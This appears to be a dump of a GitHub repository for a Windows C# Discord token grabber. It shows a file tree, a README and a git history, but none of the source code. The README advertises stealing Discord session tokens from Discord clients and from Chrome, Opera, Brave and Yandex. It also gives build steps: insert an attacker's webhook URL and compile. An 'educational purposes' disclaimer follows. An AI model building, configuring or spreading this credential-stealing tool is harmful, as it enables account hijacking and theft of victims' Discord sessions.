======================: FILES :======================
Discord-TokenGrabber
├── grabber.cs
├── README.md
└── vs-build
    ├── App.config
    ├── discord_token_grabber.csproj
    ├── discord_token_grabber.sln
    ├── grabber.cs
    ├── Program.cs
    ├── Properties
    │   └── AssemblyInfo.cs
    ├── Webhook.cs
    └── Webhook.Designer.cs

2 directories, 10 files
======================: README CONTENT :======================
# Discord Token Grabber
*Language: c#*
*Works only on windows*

***
# Features:
* Grabber supports multiple directories
- [x] Discord, Discord Canarry, Discord PTB
- [x] Google Chrome, Opera, Brave, Yandex
- [ ] Firefox
* No need to install libraries

### Screenhot:
![](https://media.discordapp.net/attachments/769178644697972767/798668256251478106/unknown.png)

# Build:
1. In the `vs-build` folder, open the `discord_token_grabber` project with the `visual studio`.
2. In file `Webhook.cs`, paste your webhook url to `WEBHOOK_URL`
3. Build the program
4. Done, now you have a token grabber.

*The grabber.cs have all methods for receiving and sending a token.*
***
# Legality
Everything you can see here has been made for educational purposes and proof of concepts. I do not promote the usage of my tools, I do not take responsability on the bad usage of this tool.
====================== GIT HISTORY: ======================
7d302da HEAD@{0}: clone: from https://github.com/Jansy-cc/Discord-TokenGrabber
commit 7d302da77af263d508ebddcc64e038621aae449b
Author: Sigma-cc <77269679+Sigma-cc@users.noreply.github.com>
Date:   Tue Jan 12 23:53:27 2021 +0200

    Update README.md

commit e6db882dbb3f94b7dc46c0063fc7ce06ab118b81
Author: Sigma-cc <77269679+Sigma-cc@users.noreply.github.com>
Date:   Tue Jan 12 23:14:11 2021 +0200

    example build

commit f53eefda106ef58801428ef861691447fd64364a
Author: Sigma-cc <77269679+Sigma-cc@users.noreply.github.com>
Date:   Tue Jan 12 23:11:47 2021 +0200

    Delete t

commit c615b4a8314a319d9f82d85412c4c48012b446d2
Author: Sigma-cc <77269679+Sigma-cc@users.noreply.github.com>
Date:   Tue Jan 12 23:10:36 2021 +0200

    example build
    
    So that you can quickly build the grabber.

commit 20b0a3541de7b727e4587c5c2422e8ffb0088169
Author: Sigma-cc <77269679+Sigma-cc@users.noreply.github.com>
Date:   Tue Jan 12 23:07:29 2021 +0200

    Create t

commit df2acb6ef4f1d6c597090177f2624845f31de712
Author: Sigma-cc <77269679+Sigma-cc@users.noreply.github.com>
Date:   Tue Jan 12 23:01:24 2021 +0200

    Add files via upload

commit ac6943653b7941a3c666e72384cd0d4bb9b0ae6c
Author: Sigma-cc <77269679+Sigma-cc@users.noreply.github.com>
Date:   Tue Jan 12 22:45:38 2021 +0200

    Initial commit
